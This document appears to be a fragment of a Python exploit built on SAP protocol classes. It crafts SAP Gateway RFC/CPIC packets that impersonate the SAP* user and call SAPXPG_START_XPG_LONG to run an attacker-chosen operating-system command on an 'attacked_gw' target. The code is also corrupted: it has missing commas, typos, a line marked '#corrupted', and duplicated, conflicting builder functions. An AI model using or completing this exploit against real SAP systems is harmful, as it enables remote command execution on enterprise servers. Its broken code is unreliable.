def do_connect(self, args):
""" Initiate the connection to the Gateway service. The connection is
registered using the client_string runtime option. """
# Create the socket connection
try:
self.connection = SAPRoutedStreamSocket.get_nisocket(
self.options.remote_host,
self.options.remote_port,
self.options.route_string,
base_cls=SAPRFC)
except SocketError as e:
self._error("Error connecting with the Gateway service")
self._error(str(e))
return
self._print("Attached to %s / %d" %
(self.options.remote_host, self.options.remote_port))
p = SAPRFC(version=int(self.runtimeoptions["version"]), req_type=1)
self._debug("Sending check gateway packet")
try:
response = self.connection.send(p)
except SocketError:
self._error("Error connecting to the gateway monitor service")
else:
self.connected = True
def do_noop(self, args):
""" Send a noop command to the Gateway service. """
if not self.connected:
self._error("You need to connect to the server first !")
return
p = SAPRFC(version=int(self.runtimeoptions["version"]),
req_type=9,
cmd=1)
self._debug("Sending noop packet")
response = self.connection.send(p)
def build_p2():
dt_structure = SAPRFCDTStruct(version=96,
padd1='\x00\x00\x00\x00\x00\x00\x00\x00',
root_id = '\x0E\x02\x00\x00\x00\x00\xE8\x4D\x23\x00\xDF\x07\x00\x00\x01\x00',
conn_id = '\x4E\xD5\x81\xE3\x09\xF6\xF1\x18\xA0\x0A\x00\x0C\x29\x00\x99\xD0',
conn_id_suff=0,
timeout =-1,
keepalive_timeout=-1,
export_trace=2,
start_type='DEFAULT',
net_protocol=10,
local_addrv6='::{}'.format(attacked_gw['ip'])
long_lu = attacked_gw['ip'],
padd3 = '\x00' * 16,
user= '******',
padd4 = '\x20' * 8,
padd5 = '\x00' * 4,
padd6 = '\x20' * 12,
padd7 = '\x00' * 16,
addr_ipv4=attacked_gw['ip'],
padd8 = '\x00' * 4,
long_tp = 'sapxpg',
)
ext_inf = SAPRFCEXTEND(short_dest_name=attacked_gw['dest_name'],
ncpic_lu='196.168.50.46'
ncpic_tp='sapxpg'
ctypes='STARTED_PRG',
clientInfo=1,
ncpic_parameters_padd='\x00\x00',
comm_idx=0,
conn_idx=65535,
)
p2 = SAPRFC(version=6,func_type='F_SAP_INIT',
protocol = 'CPIC',
MODE=0,
UID=19,
gw_id=65535,
err_len=0,
info2='WITH_LONG_LU_NAME',
trace_level=0,
time=0
info='GW_EXTENDED_INIT_OPTIONS+GW_DIST_TRACE',
padd_appc=0,
vector=0,
appc_rc='CM_OK',
sap_rc=0,
sap_ext_header =ext_inf,
sap_param=dt_structure
)
#p2.show2()
return p2
def build_p1(ip, inbr):
p1 = SAPRFC(
version=2,
req_type='GW_NORMAL_CLIENT',
address=ip,
service='sapgw{}'.format(inbr),
codepage=4103,
lu='sapserve',
tp='sapgw{}'.format(inbr),
conversation_id=' ' * 8,
appc_header_version=6,
accept_info='EINFO+PING+CONN_EINFO',
idx=-1,
)
return p1
def build_p3(conv_id):
cpic_suf = SAPCPICSUFFIX(
suff_padd1='\x10\x04\x02',
suff_unk1='\x00\x01\x87\x68\x00\x00\x04\x4c\x00\x00\x0b\xb8',
suff_padd2='\x10\x04\x0b',
suff_unk2='\xff\x7f\xfa\x0d\x78\xb7\x27\xde\xf6\x19\x62\x93\x25\xbf\x15\x93\xef\x73\xfe\xeb\xdb\x51\xed\x00\x00\x00\x00\x00\x00\x00\x00\x00',
suff_padd3='\x10\x04\x04',
suff_unk3='\x00\x16\x00\x07\x00\x10\x00\x07',
suff_padd4='\x10\x04\x0d',
suff_unk4='\x00\x00\x00\x27\x00\x00\x01\x0c\x00\x00\x00\x35\x00\x00\x01\x0c',
suff_padd5='\x10\x04\x16',
suff_unk5='\x00\x11',
suff_padd6='\x10\x04\x17',
suff_unk6='\x00\x22',
suff_padd7='\x10\x04\x19',
suff_unk7='\x00\x00',
suff_padd8='\x10\x04\x1e',
suff_unk8='\x00\x00\x03\x67\x00\x00\x07\x58',
suff_padd9='\x10\x04\x25',
suff_unk9='\x00\x01',
suff_padd10k='\x10\x04\x09',
suff_kernel=attacked_gw['Kernel'],
suff_padd10='\x10\x04\x1d',
suff_unk10='\x30',
suff_padd11='\x10\x04\x1f',
suff_cli1='Windows 7 Professional 6.1 (7601) Servic',
suff_padd12='\x10\x04\x20',
suff_cli2='IE 9.10.9200.16618',
suff_padd13='\x10\x04\x21',
suff_cli3='Office 12',
suff_padd14='\x10\x04\x24',
suff_unk14='\x00\x00\x04\x1a\x00\x00\x07\x80',
suff_padd15='\x10\x04\x13',
suff_unk15='\x02\xe1\xd4\x81\xe3\x0b\x21\xf1\x01\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x01\x37\xd5\x81\xe3\x88\x9a\xf1\x6b\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x00',
)
xpg = SAPRFXPG(
xpg_padd100='\x05\x12\x02\x05',
xpg_convid_1='CONVID',
xpg_padd101='\x02\x05\x02\x05',
xpg_strstat_l='STRTSTAT',
xpg=padd102='\x02\x05\x02\x05',
xpg_xpgid_l='XPGID',
xpg_padd103='\x02\x05\x02\x01',
xpg_extprog_l='EXTPROG',
xpg_padd104='\x02\x01\x02\x03',
xpg_extprog_val='{: <128}'.format(cmd),
xpg_padd105='\x02\x03\x02\x01',
xpg_longparam_l='LONG_PARAMS',
xpg_padd106='\x02\x01\x02\x03',
xpg_longparam_val='{: <1024}'.format(cmd_lparams),
xpg_padd107='\x02\x03\x02\x01',
xpg_param_1='PARAMS',
xpg_padd108='\x02\x01\x02\x03',
xpg_stderrcntl_1='STDERRCNTL',
xpg_padd110='\x02\x01\x02\x03',
xpg_stderrcntl_val='M',
xpg_padd111='\x02\x03\x02\x01',
xpg_stdinctl_1='STDINCNTL',
xpg_padd112='\x02\x01\x02\x03',
xpg_stdinctl_val='M',
xpg_padd113='\x02\x03\x02\x01',
xpg_stdoutcntl_l='STDOUTCNTL',
xpg_padd114='\x02\x01\x02\x03',
xpg_stdountcntl_val='M',
xpg_padd115='\x02\x03\x02\x01',
xpg_termcntl_1='TERMCNTL',
xpg_padd116='\x02\x01\x02\x03',
xpg_termcntl_val='C',
xpg_padd117='\x02\x03\x02\x01',
xpg_trcaecntl='TRACECNTL',
xpg_padd118='\x02\x01\x02\x03',
xpg_tacecntl_val='6',
xpg_padd119='\x02\x03\x03\x01',
xpg_log_l='LOG',
xpg_padd120='\x03\x01\x03\x30',
xpg_log_val1='\x00\x00\x00\x01',
xpg_padd121='\x03\x30\x03\x02',
xpg_unk1='\x00\x00\x00\x80\x00\x00\x00\x00',
)
cpic_params2 = SAPCPICPARAM2(# dunno why this value
param1='\xe3\x81\xd5\x4e\xf6\x09\x19\xf1',
param2 = '\xe3\xa0\xba\x9a\xec\xea\x55\x80\x0a\x4e\xd5',
param_sess_1 = '\x81\xe3',#session ist part
param_sess_2 = '\x09\xf6\xf1\x18',#session 2nd part
mask='225.0.0.0',
ip= attacked_gw['ip'], #Extremely cricital and dangerous
flag=1,
)
cpic_params2=SAPCPICPARAM2(#dunno ths values
param1='\xe3\x81\xd5\x4e\xf6\x09\x19\xf1', #session
mask='160.10.0.12',
ip = '41.0.153.208', #Dangerous and critical
)
th = SAPRFCTHStruct(
th_eyecl="*TH*",
th_version=3,
th_len=230,
th_trace_flag=0,
th_sysid='{}/{}_{}_{}'.format(attacked_gw["sid"],attcked_gw[hostname],attacked_gw['sid'],attacked_gw['instance']),
th_service=1,
th_service=1,
th_userid='SAP*',
th_action='SM49',
th_acttype=1,
th_pressysid='{}/{}_{}_{}'.format(attacked_gw["sid"],attacked_gw['hostname'],attacked_gw['sid'],attacked_gw['instance']),
th_id='37D581E3889AF16DA00A000C290099D0001',
th_some_cpic_params=cpic_params,
th_eyec2="*TH*",
)
cpic = SAPCPIC(
cpic_start_padd='\x01\x01\x00\x08',
cpic_cpic_leng=257,
cpic_padd003="\x01\x01\x01\x01",
cpic_unk02="",
cpic_padd0002='\x01\x01\x01\x03',
cpic_unk01="\x00\x00\x06\x1b",
cpic_padd0001="\x01\x03\x01\x06 cpic_
cpic_padd002="\x01\x01\x01\x03",
cpic_unk02="\x00\x00\x06\x1b",
cpic_padd001="\x01\x03\x01\x06",
cpic_unk00="\x04\x01\x00\x03\x01\x03\x02\x00\x00\x00\x23",
cpic_padd001="\x01\x06\x00\x07",
cpic_ip='un
#corrupted
)
p3 = SAPRFC(version=6,
func_type='F_SAP_SEND',
protocol='CPIC',
mode=0,
uid=19,
gw_id=1,
err_len=0,
info3=0,
timeout=500,#timeout im miliiseconds
info4=0,
seq_no=0,
sap_param_len=8,
padd_appc=0,
info = 'SYNC_CPIC_FUNCTION+WITH_GW_SAP_PARAMS_HDR+R3_CPIC_LOGIN_WITH_TERM',
vector='F_V_SEND_DATA+F_V_RECEIVE',
appc_rc='CM_OK',
sap_rc=0,
conv_id=conv_id,
cm_ok_padd='\x00'*31 + '\x02',
sap_cpic=cpic,
cpic_packet_size=len(cpic),
rfc_packet_size=28000,
)
#p3.show2()
return p3
def buld_p4(conv_id):
cpic_params = SAPCPICPARAM(
param1='\x00\x99\xd0\x1e',
param2='\xe3\xa0\xba\x9a\xec\xea\x55\x80\x0a\x4e\xd5',
param_sess_1='\x81\xe3', # session 1st part?
param_sess_2='\x09\xf6\xf1\x18', # session 2nd part?
mask='160.10.0.12',
ip='41.0.153.208',
flag=2,
)
cpic_params2 = SAPCPICPARAM2( #dunno why this values
param1='\xe3\x81\xd5\x4e\xf6\x09\x19\xf1',
mask='160.10.0.12',
ip='41.0.153.208',
)
sap_xpg_end = SAPRFXPG_END(
xpg_end_padd001='\x05\x12\x02\x05',
xpg_end_ecode_l='EXITCODE',
xpg_end_padd002='\x02\x05\x02\x05',
xpg_end_estat_l='STRTSTAT',
xpg_end_padd003='\x02\x05\x03\x01',
xpg_end_log_l='LOG',
xpg_end_padd004='\x03\x01\x03\x30',
xpg_end_unk1='\x00\x00\x00\x01',
xpg_end_padd005='\x03\x30\x03\x02',
xpg_end_unk2='\x00\x00\x00\x80\x00\x00\x00\x00',
)
cpic_suf = SAPCPICSUFFIX(
suff_padd1='\x10\x04\x02',
suff_unk1='\x00\x01\x87\x68\x00\x00\x04\x4c\x00\x00\x0b\xb8',
suff_padd2='\x10\x04\x0b',
suff_unk2=
'\xff\x7f\xfa\x0d\x78\xb7\x27\xde\xf6\x19\x62\x93\x25\xbf\x15\x93\xef\x73\xfe\xeb\xdb\x51\xed\x00\x00\x00\x00\x00\x00\x00\x00\x00',
suff_padd3='\x10\x04\x04',
suff_unk3='\x00\x16\x00\x07\x00\x10\x00\x07',
suff_padd4='\x10\x04\x0d',
suff_unk4=
'\x00\x00\x00\x27\x00\x00\x01\x0c\x00\x00\x00\x35\x00\x00\x01\x0c',
suff_padd5='\x10\x04\x16',
suff_unk5='\x00\x11',
suff_padd6='\x10\x04\x17',
suff_unk6='\x00\x22',
suff_padd7='\x10\x04\x19',
suff_unk7='\x00\x00',
suff_padd8='\x10\x04\x1e',
suff_unk8='\x00\x00\x03\x67\x00\x00\x07\x58',
suff_padd9='\x10\x04\x25',
suff_unk9='\x00\x01',
suff_padd10k='\x10\x04\x09',
suff_kernel=attacked_gw['kernel'],
suff_padd10='\x10\x04\x1d',
suff_unk10='\x30',
suff_padd11='\x10\x04\x1f',
suff_cli1='Windows 7 Professional 6.1 (7601) Servic',
suff_padd12='\x10\x04\x20',
suff_cli2='IE 9.10.9200.16618',
suff_padd13='\x10\x04\x21',
suff_cli3='Office 12',
suff_padd14='\x10\x04\x24',
suff_unk14='\x00\x00\x04\x1a\x00\x00\x07\x80',
suff_padd15='\x10\x04\x13',
suff_unk15=
'\x02\xe1\xd4\x81\xe3\x0b\x21\xf1\x01\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x01\x37\xd5\x81\xe3\x88\x9a\xf1\x6b\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x00',
)
cpic2 = SAPCPIC2(
cpic_padd015_1='\x01\x36',
some_cpic_params=cpic_params,
cpic_padd016='\x01\x36\x05\x02',
cpic_convid_label='',
cpic_padd017='\x05\x02\x00\x0b',
cpic_kernel3=attacked_gw['kernel'],
cpic_padd018='\x00\x0b\x01\x02',
cpic_RFC_f='SAPXPG_END_XPG',
cpic_padd019='\x01\x02\x05\x03',
cpic_unk4='',
cpic_padd021='\x05\x03\x05\x14',
some_cpic_params2=cpic_params2,
cpic_padd022='\x05\x14\x04\x20',
cpic_unk6='\x00\x00\x00\x00',
cpic_padd023='\x04\x20\x05\x12',
cpic_unk7='',
xpg_end=sap_xpg_end,
cpic_padd024='\x03\x02\x01\x04',
cpic_suff=cpic_suf,
cpic_end_padd='\x01\x04\xff\xff',
cpic_end='',
cpic_end_sig='\xff\xff\x00\x00',
)
p4 = SAPRFC(
version=6,
func_type='F_SAP_SEND',
protocol='CPIC',
mode=0,
uid=19,
gw_id=1,
err_len=0,
info2=0,
trace_level=0,
time=0,
info3=0,
timeout=500,
info4=0,
seq_no=0,
sap_param_len=8,
padd_appc=0,
info=
'SYNC_CPIC_FUNCTION+WITH_GW_SAP_PARAMS_HDR+R3_CPIC_LOGIN_WITH_TERM',
vector='F_V_SEND_DATA+F_V_RECEIVE',
appc_rc='CM_OK',
sap_rc=0,
conv_id=conv_id,
cm_ok_padd='\x00' * 31 + '\x02',
sap_cpic_cut=cpic2,
cpic_packet_size=len(cpic2),
rfc_packet_size=28000,
)
#p4.show2()
return p4
def buld_p3(conv_id):
cpic_suf = SAPCPICSUFFIX(
suff_padd1='\x10\x04\x02',
suff_unk1='\x00\x01\x87\x68\x00\x00\x04\x4c\x00\x00\x0b\xb8',
suff_padd2='\x10\x04\x0b',
suff_unk2=
'\xff\x7f\xfa\x0d\x78\xb7\x27\xde\xf6\x19\x62\x93\x25\xbf\x15\x93\xef\x73\xfe\xeb\xdb\x51\xed\x00\x00\x00\x00\x00\x00\x00\x00\x00',
suff_padd3='\x10\x04\x04',
suff_unk3='\x00\x16\x00\x07\x00\x10\x00\x07',
suff_padd4='\x10\x04\x0d',
suff_unk4=
'\x00\x00\x00\x27\x00\x00\x01\x0c\x00\x00\x00\x35\x00\x00\x01\x0c',
suff_padd5='\x10\x04\x16',
suff_unk5='\x00\x11',
suff_padd6='\x10\x04\x17',
suff_unk6='\x00\x22',
suff_padd7='\x10\x04\x19',
suff_unk7='\x00\x00',
suff_padd8='\x10\x04\x1e',
suff_unk8='\x00\x00\x03\x67\x00\x00\x07\x58',
suff_padd9='\x10\x04\x25',
suff_unk9='\x00\x01',
suff_padd10k='\x10\x04\x09',
suff_kernel=attacked_gw['kernel'],
suff_padd10='\x10\x04\x1d',
suff_unk10='\x30',
suff_padd11='\x10\x04\x1f',
suff_cli1='Windows 7 Professional 6.1 (7601) Servic',
suff_padd12='\x10\x04\x20',
suff_cli2='IE 9.10.9200.16618',
suff_padd13='\x10\x04\x21',
suff_cli3='Office 12',
suff_padd14='\x10\x04\x24',
suff_unk14='\x00\x00\x04\x1a\x00\x00\x07\x80',
suff_padd15='\x10\x04\x13',
suff_unk15=
'\x02\xe1\xd4\x81\xe3\x0b\x21\xf1\x01\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x01\x37\xd5\x81\xe3\x88\x9a\xf1\x6b\xa0\x0a\x00\x0c\x29\x00\x99\xd0\x00',
)
xpg = SAPRFXPG(
xpg_padd100='\x05\x12\x02\x05',
xpg_convid_l='CONVID',
xpg_padd101='\x02\x05\x02\x05',
xpg_strstat_l='STRTSTAT',
xpg_padd102='\x02\x05\x02\x05',
xpg_xpgid_l='XPGID',
xpg_padd103='\x02\x05\x02\x01',
xpg_extprog_l='EXTPROG',
xpg_padd104='\x02\x01\x02\x03',
xpg_extprog_val='{: <128}'.format(cmd),
xpg_padd105='\x02\x03\x02\x01',
xpg_longparam_l='LONG_PARAMS',
xpg_padd106='\x02\x01\x02\x03',
xpg_longparam_val='{: <1024}'.format(cmd_lparams),
xpg_padd107='\x02\x03\x02\x01',
xpg_param_l='PARAMS',
xpg_padd108='\x02\x01\x02\x03',
xpg_param_val='{: <255}'.format(cmd_params),
xpg_padd109='\x02\x03\x02\x01',
xpg_stderrcntl_l='STDERRCNTL',
xpg_padd110='\x02\x01\x02\x03',
xpg_stderrcntl_val='M',
xpg_padd111='\x02\x03\x02\x01',
xpg_stdincntl_l='STDINCNTL',
xpg_padd112='\x02\x01\x02\x03',
xpg_stdincntl_val='R',
xpg_padd113='\x02\x03\x02\x01',
xpg_stdoutcntl_l='STDOUTCNTL',
xpg_padd114='\x02\x01\x02\x03',
xpg_stdoutcntl_val='M',
xpg_padd115='\x02\x03\x02\x01',
xpg_termcntl_l='TERMCNTL',
xpg_padd116='\x02\x01\x02\x03',
xpg_termcntl_val='C',
xpg_padd117='\x02\x03\x02\x01',
xpg_tracecntl_l='TRACECNTL',
xpg_padd118='\x02\x01\x02\x03',
xpg_tracecntl_val='6',
xpg_padd119='\x02\x03\x03\x01',
xpg_log_l='LOG',
xpg_padd120='\x03\x01\x03\x30',
xpg_log_val1='\x00\x00\x00\x01',
xpg_padd121='\x03\x30\x03\x02',
xpg_unk1='\x00\x00\x00\x80\x00\x00\x00\x00',
)
cpic_params = SAPCPICPARAM(
param1='\x00\x99\xd0\x1e',
param2='\xe3\xa0\xba\x9a\xec\xea\x55\x80\x0a\x4e\xd5',
param_sess_1='\x81\xe3', # session 1st part?
param_sess_2='\x09\xf6\xf1\x18', # session 2nd part?
mask='225.0.0.0',
ip=attacked_gw['ip'],
flag=1,
)
cpic_params2 = SAPCPICPARAM2( #dunno why this values
param1='\xe3\x81\xd5\x4e\xf6\x09\x19\xf1',
mask='160.10.0.12',
ip='41.0.153.208',
)
th = SAPRFCTHStruct(
th_eyec1="*TH*",
th_version=3,
th_len=230,
th_trace_flag=0,
th_sysid='{}/{}_{}_{}'.format(attacked_gw["sid"],
attacked_gw['hostname'],
attacked_gw['sid'],
attacked_gw['instance']),
th_serevice=1,
th_userid='SAP*',
th_action='SM49',
th_acttype=1,
th_presysid='{}/{}_{}_{}'.format(attacked_gw["sid"],
attacked_gw['hostname'],
attacked_gw['sid'],
attacked_gw['instance']),
th_id='37D581E3889AF16DA00A000C290099D0001',
th_some_cpic_params=cpic_params,
th_eyec2="*TH*",
)
cpic = SAPCPIC(
cpic_start_padd='\x01\x01\x00\x08',
cpic_cpic_length=257,
cpic_padd0003="\x01\x01\x01\x01",
cpic_unk02="",
cpic_padd0002="\x01\x01\x01\x03",
cpic_unk01="\x00\x00\x06\x1b",
cpic_padd0001="\x01\x03\x01\x06",
cpic_unk00="\x04\x01\x00\x03\x01\x03\x02\x00\x00\x00\x23",
cpic_padd001="\x01\x06\x00\x07",
cpic_ip='{: <15}'.format(attacked_gw['ip']),
cpic_padd002='\x00\x07\x00\x18',
cpic_ip2=attacked_gw['ip'],
cpic_padd003='\x00\x18\x00\x08',
cpic_host_sid_inbr='{}_{}_{}'.format(attacked_gw['hostname'],
attacked_gw['sid'],
attacked_gw['instance']),
cpic_padd004='\x00\x08\x00\x11',
cpic_rfc_type='3',
cpic_padd005='\x00\x11\x00\x13',
cpic_kernel1='{} '.format(attacked_gw['kernel']),
cpic_padd006='\x00\x13\x00\x12',
cpic_kernel2='{} '.format(attacked_gw['kernel']),
cpic_padd007='\x00\x12\x00\x06',
cpic_dest=attacked_gw['dest_name'],
cpic_padd008='\x00\x06\x01\x30',
cpic_program='SAPLSSXP',
cpic_padd009='\x01\x30\x01\x11',
cpic_username1='SAP*',
cpic_padd010='\x01\x11\x01\x14',
cpic_cli_nbr1=attacked_gw['cli_nbr'],
cpic_padd011='\x01\x14\x01\x15',
cpic_unk1='E',
cpic_padd012='\x01\x15\x00\x09',
cpic_username2='SAP*',
cpic_padd013='\x00\x09\x01\x34',
cpic_cli_nbr2=attacked_gw['cli_nbr'],
cpic_padd014='\x01\x34\x05\x01',
cpic_unk2='\x01',
cpic_padd015_0='\x05\x01', # <----
cpic_padd015_1='\x01\x36', # <----
some_cpic_params=cpic_params,
cpic_padd016='\x01\x36\x05\x02',
cpic_convid_label='',
cpic_padd017='\x05\x02\x00\x0b',
cpic_kernel3=attacked_gw['kernel'],
cpic_padd018='\x00\x0b\x01\x02',
cpic_RFC_f='SAPXPG_START_XPG_LONG',
cpic_padd019='\x01\x02\x05\x03',
cpic_unk4='',
cpic_padd020='\x05\x03\x01\x31',
cpic_th_struct=th,
cpic_padd021='\x01\x31\x05\x14',
some_cpic_params2=cpic_params2,
cpic_padd022='\x05\x14\x04\x20',
cpic_unk6='\x00\x00\x00\x00',
cpic_padd023='\x04\x20\x05\x12',
cpic_unk7='',
xpg_p=xpg,
cpic_padd024='\x03\x02\x01\x04',
cpic_suff=cpic_suf,
cpic_end_padd='\x01\x04\xff\xff',
cpic_end='',
cpic_end_sig='\xff\xff\x00\x00',
)
p3 = SAPRFC(
version=6,
func_type='F_SAP_SEND',
protocol='CPIC',
mode=0,
uid=19,
gw_id=1,
err_len=0,
info2=0,
trace_level=0,
time=0,
info3=0,
timeout=500,
info4=0,
seq_no=0,
sap_param_len=8,
padd_appc=0,
info=
'SYNC_CPIC_FUNCTION+WITH_GW_SAP_PARAMS_HDR+R3_CPIC_LOGIN_WITH_TERM',
vector='F_V_SEND_DATA+F_V_RECEIVE',
appc_rc='CM_OK',
sap_rc=0,
conv_id=conv_id,
cm_ok_padd='\x00' * 31 + '\x02',
sap_cpic=cpic,
cpic_packet_size=len(cpic),
rfc_packet_size=28000,
)
#p3.show2()
return p3
